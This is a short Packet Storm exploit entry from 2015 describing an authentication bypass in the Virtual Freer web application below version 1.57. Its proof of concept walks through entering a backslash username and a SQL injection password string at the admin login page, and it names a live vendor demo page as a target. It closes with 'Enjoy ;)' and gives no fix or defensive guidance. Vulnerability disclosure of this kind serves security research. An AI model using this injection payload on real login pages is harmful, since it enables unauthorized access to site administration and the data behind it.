Virtual Freer Authentication Bypass

2015-09-04T00:00:00
ID PACKETSTORM:133439
Type packetstorm
Reporter Mohammad Reza Espargham
Modified 2015-09-04T00:00:00

Description

                                        
                                            `# Title : Virtual Freer < 1.57 - Authentication Bypass  
  
# Tested : CentOS / php  
  
# Vendor Homepage: http://freer.ir  
  
#  
  
#  
  
#  
  
# Author : Mohammad Reza Espargham  
  
# Linkedin : https://ir.linkedin.com/in/rezasp  
  
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com  
  
# Website : www.reza.es  
  
# Twitter : https://twitter.com/rezesp  
  
# FaceBook : https://www.facebook.com/mohammadreza.espargham  
  
#  
  
#  
  
# PoC:  
  
#  
  
# 1 . start  
  
# 2 . Start Browse / Go to http://site.com/back/login.php  
  
# 3 . Enter Username : \  
  
# 4 . Enter Password : or 1=1 -- /*  
  
# 5 . Enjoy ;)  
  
# 5 . Finished  
  
#  
  
#  
  
# Demo Target : http://freer.ir/virtual/demo/back/login.php  
  
#  
  
  
  
  
  
--   
Mohammad Reza Espargham  
www.reza.es  
`